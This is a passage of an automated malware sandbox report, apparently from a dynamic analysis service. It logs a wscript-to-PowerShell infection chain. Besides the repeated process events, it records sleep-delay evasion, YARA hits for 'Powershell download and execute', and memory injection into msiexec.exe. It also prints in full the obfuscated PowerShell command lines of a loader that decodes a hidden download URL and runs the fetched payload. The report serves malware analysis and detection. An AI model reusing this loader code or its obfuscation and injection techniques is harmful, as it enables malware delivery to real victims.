              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4695Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5181Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5830Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4010Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7932Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8148Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: powershell.exe, 00000002.00000002.1541299275.000002919891C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWf=%SystemRoot%\system32\mswsock.dllsnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$Sympatisrers=$Palaveres[0];$Dodrantal110=(Rundholt'#P
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0095D6F8 LdrInitializeThunk,4_2_0095D6F8

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_7796.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7796, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8036, type: MEMORYSTR
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 38F0000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 267FDE8Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$SJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#akaniaceae herefords skifertavles #>;$tennisalbue='landgrnse';<#tallerkenret gravkers bandonion #>;$unvicarious156=$host.privatedata;if ($unvicarious156) {$sanitetsartikel++;}function rundholts($affectationist){$blasfemiernes=$hittebarnets+$affectationist.length-$sanitetsartikel;for( $fastendes=5;$fastendes -lt $blasfemiernes;$fastendes+=6){$composersatserne+=$affectationist[$fastendes];}$composersatserne;}function katedres($threadlike){ . ($absoluthed) ($threadlike);}$oxyhemocyanin=rundholts 'pa opmrach obarnez ormi con lptolel syntacompo/nonse5 rheo.netw 0 opsi tvanm(,lyvewunembib,eotn pasadpostcoou,dew unars dagb mussondvaletnymp. spros1alp n0a ton.ji ga0runds; myel landiwmalniil thonunmud6pr,se4 spek;tilba udloexsyste6 anne4ignor; unig rejmrgoalpv awki: arto1maale2dogto1pupil.outbl0sem h)sl,ms shr wgbredlendhavcd uidk runco,aser/p.wer2cenes0milje1talle0sikke0 dybt1over 0 brun1mi ia nonrefserviitomboruf gleudsmyftormeo bathxsamle/gdann1till 2blemi1stipe.bookn0sgete ';$paahngsmotors=rundholts 'ci.arutrv esr.cereapostr.amme-evaluavoka g turgeperbonredistphyto ';$sympatisrers=rundholts 'aboithudp,ntsmaratxanthpfuldbsg dro:p aco/sc ot/besind uachrhvidei opulvno pheaflas.hy,erginforo hurkostoreglabill bilre s lv.pteroc rytmopiddlm bi l/sporvu anaccindre?dataoesti fxmaterp yde oopgavrfalsktswap = lyndplasho supewr.petngrofeltj lko ecodaskriddamuei&.orsgik ssedr sso= inde1inse 6u,stoksubbru ha,pqs.rimagloosqregel_gennexsuper6lodgiz s,urb ysfub impuhmu,tiacontegv nstn i mankredis stude da.awurdypu b les.ilatwforedubawdsaverbazhjttax kloat pr.cxsolodg ballv fags7 papn ';$afrimninger=rundholts ' dies> iamb ';$absoluthed=rundholts 'indadirekruedissex gyro ';$fastendesnconsultable='misappropriating';$newfangle='\forsvarsministers.sca';katedres (rundholts 'rbest$tienngletmelkonomo ubcubtrommaslugglgaade:overmmjewbiiearlilsdmefltr,ppigrillolodren fmatebysterprivi=toupe$ asseerotatntrustvhelv :fasefahoa.cp .apip diurdstaala.alketdietha manu+datak$h ternoutbleud,paw dis.f scamast genrep.iglse.al crabe prel ');katedres (rundholts 'grnse$sinu gs.blel.estaosamarbrefuea min lsema.:va.sopstro askalkltechnaskrabvatomverigsgrgal.eerema,sbi al=hornb$irizistestiyreim,munm sp oddvave,rttsociaiunsubs indlr udbreerfarrfolkesalter.shrins ag.rpbild,lbrugsi fllet gge (hjemk$ sperapuslifint rr sprgien.anmhusbenfatheiricarnskandg sharest,icroverr)di mi ');katedres (rundholts 'kn wf[forthn sygee o tptdisbu.metals skriesmartrjalo,vtiptiiharpwc vikte,welfpdermaotidsbi malcnmonotttrollm f,aaa shign ste afllesgudvanenivelr sawe]tkked: molm:trak,sunseneforinckissiurefelrlustri artht noncy rustptankvrbogstobo ettarrecononh cisfl.ovraiclphyl ch ff=preco apath[anmelnydedeeodysstsynus.besnasacclaealbsrcsidesucircur hotoia.sisttvangyudmunpstaderho liogeno,t f,sioko,doct.lesohybrilindbitnormay tranplondoeswitc]kinet:rimes: unret ancl impesroolu1vault2 ,kri ');$s
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#akaniaceae herefords skifertavles #>;$tennisalbue='landgrnse';<#tallerkenret gravkers bandonion #>;$unvicarious156=$host.privatedata;if ($unvicarious156) {$sanitetsartikel++;}function rundholts($affectationist){$blasfemiernes=$hittebarnets+$affectationist.length-$sanitetsartikel;for( $fastendes=5;$fastendes -lt $blasfemiernes;$fastendes+=6){$composersatserne+=$affectationist[$fastendes];}$composersatserne;}function katedres($threadlike){ . ($absoluthed) ($threadlike);}$oxyhemocyanin=rundholts 'pa opmrach obarnez ormi con lptolel syntacompo/nonse5 rheo.netw 0 opsi tvanm(,lyvewunembib,eotn pasadpostcoou,dew unars dagb mussondvaletnymp. spros1alp n0a ton.ji ga0runds; myel landiwmalniil thonunmud6pr,se4 spek;tilba udloexsyste6 anne4ignor; unig rejmrgoalpv awki: arto1maale2dogto1pupil.outbl0sem h)sl,ms shr wgbredlendhavcd uidk runco,aser/p.wer2cenes0milje1talle0sikke0 dybt1over 0 brun1mi ia nonrefserviitomboruf gleudsmyftormeo bathxsamle/gdann1till 2blemi1stipe.bookn0sgete ';$paahngsmotors=rundholts 'ci.arutrv esr.cereapostr.amme-evaluavoka g turgeperbonredistphyto ';$sympatisrers=rundholts 'aboithudp,ntsmaratxanthpfuldbsg dro:p aco/sc ot/besind uachrhvidei opulvno pheaflas.hy,erginforo hurkostoreglabill bilre s lv.pteroc rytmopiddlm bi l/sporvu anaccindre?dataoesti fxmaterp yde oopgavrfalsktswap = lyndplasho supewr.petngrofeltj lko ecodaskriddamuei&.orsgik ssedr sso= inde1inse 6u,stoksubbru ha,pqs.rimagloosqregel_gennexsuper6lodgiz s,urb ysfub impuhmu,tiacontegv nstn i mankredis stude da.awurdypu b les.ilatwforedubawdsaverbazhjttax kloat pr.cxsolodg ballv fags7 papn ';$afrimninger=rundholts ' dies> iamb ';$absoluthed=rundholts 'indadirekruedissex gyro ';$fastendesnconsultable='misappropriating';$newfangle='\forsvarsministers.sca';katedres (rundholts 'rbest$tienngletmelkonomo ubcubtrommaslugglgaade:overmmjewbiiearlilsdmefltr,ppigrillolodren fmatebysterprivi=toupe$ asseerotatntrustvhelv :fasefahoa.cp .apip diurdstaala.alketdietha manu+datak$h ternoutbleud,paw dis.f scamast genrep.iglse.al crabe prel ');katedres (rundholts 'grnse$sinu gs.blel.estaosamarbrefuea min lsema.:va.sopstro askalkltechnaskrabvatomverigsgrgal.eerema,sbi al=hornb$irizistestiyreim,munm sp oddvave,rttsociaiunsubs indlr udbreerfarrfolkesalter.shrins ag.rpbild,lbrugsi fllet gge (hjemk$ sperapuslifint rr sprgien.anmhusbenfatheiricarnskandg sharest,icroverr)di mi ');katedres (rundholts 'kn wf[forthn sygee o tptdisbu.metals skriesmartrjalo,vtiptiiharpwc vikte,welfpdermaotidsbi malcnmonotttrollm f,aaa shign ste afllesgudvanenivelr sawe]tkked: molm:trak,sunseneforinckissiurefelrlustri artht noncy rustptankvrbogstobo ettarrecononh cisfl.ovraiclphyl ch ff=preco apath[anmelnydedeeodysstsynus.besnasacclaealbsrcsidesucircur hotoia.sisttvangyudmunpstaderho liogeno,t f,sioko,doct.lesohybrilindbitnormay tranplondoeswitc]kinet:rimes: unret ancl impesroolu1vault2 ,kri ');$s
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#akaniaceae herefords skifertavles #>;$tennisalbue='landgrnse';<#tallerkenret gravkers bandonion #>;$unvicarious156=$host.privatedata;if ($unvicarious156) {$sanitetsartikel++;}function rundholts($affectationist){$blasfemiernes=$hittebarnets+$affectationist.length-$sanitetsartikel;for( $fastendes=5;$fastendes -lt $blasfemiernes;$fastendes+=6){$composersatserne+=$affectationist[$fastendes];}$composersatserne;}function katedres($threadlike){ . ($absoluthed) ($threadlike);}$oxyhemocyanin=rundholts 'pa opmrach obarnez ormi con lptolel syntacompo/nonse5 rheo.netw 0 opsi tvanm(,lyvewunembib,eotn pasadpostcoou,dew unars dagb mussondvaletnymp. spros1alp n0a ton.ji ga0runds; myel landiwmalniil thonunmud6pr,se4 spek;tilba udloexsyste6 anne4ignor; unig rejmrgoalpv awki: arto1maale2dogto1pupil.outbl0sem h)sl,ms shr wgbredlendhavcd uidk runco,aser/p.wer2cenes0milje1talle0sikke0 dybt1over 0 brun1mi ia nonrefserviitomboruf gleudsmyftormeo bathxsamle/gdann1till 2blemi1stipe.bookn0sgete ';$paahngsmotors=rundholts 'ci.arutrv esr.cereapostr.amme-evaluavoka g turgeperbonredistphyto ';$sympatisrers=rundholts 'aboithudp,ntsmaratxanthpfuldbsg dro:p aco/sc ot/besind uachrhvidei opulvno pheaflas.hy,erginforo hurkostoreglabill bilre s lv.pteroc rytmopiddlm bi l/sporvu anaccindre?dataoesti fxmaterp yde oopgavrfalsktswap = lyndplasho supewr.petngrofeltj lko ecodaskriddamuei&.orsgik ssedr sso= inde1inse 6u,stoksubbru ha,pqs.rimagloosqregel_gennexsuper6lodgiz s,urb ysfub impuhmu,tiacontegv nstn i mankredis stude da.awurdypu b les.ilatwforedubawdsaverbazhjttax kloat pr.cxsolodg ballv fags7 papn ';$afrimninger=rundholts ' dies> iamb ';$absoluthed=rundholts 'indadirekruedissex gyro ';$fastendesnconsultable='misappropriating';$newfangle='\forsvarsministers.sca';katedres (rundholts 'rbest$tienngletmelkonomo ubcubtrommaslugglgaade:overmmjewbiiearlilsdmefltr,ppigrillolodren fmatebysterprivi=toupe$ asseerotatntrustvhelv :fasefahoa.cp .apip diurdstaala.alketdietha manu+datak$h ternoutbleud,paw dis.f scamast genrep.iglse.al crabe prel ');katedres (rundholts 'grnse$sinu gs.blel.estaosamarbrefuea min lsema.:va.sopstro askalkltechnaskrabvatomverigsgrgal.eerema,sbi al=hornb$irizistestiyreim,munm sp oddvave,rttsociaiunsubs indlr udbreerfarrfolkesalter.shrins ag.rpbild,lbrugsi fllet gge (hjemk$ sperapuslifint rr sprgien.anmhusbenfatheiricarnskandg sharest,icroverr)di mi ');katedres (rundholts 'kn wf[forthn sygee o tptdisbu.metals skriesmartrjalo,vtiptiiharpwc vikte,welfpdermaotidsbi malcnmonotttrollm f,aaa shign ste afllesgudvanenivelr sawe]tkked: molm:trak,sunseneforinckissiurefelrlustri artht noncy rustptankvrbogstobo ettarrecononh cisfl.ovraiclphyl ch ff=preco apath[anmelnydedeeodysstsynus.besnasacclaealbsrcsidesucircur hotoia.sisttvangyudmunpstaderho liogeno,t f,sioko,doct.lesohybrilindbitnormay tranplondoeswitc]kinet:rimes: unret ancl impesroolu1vault2 ,kri ');$sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
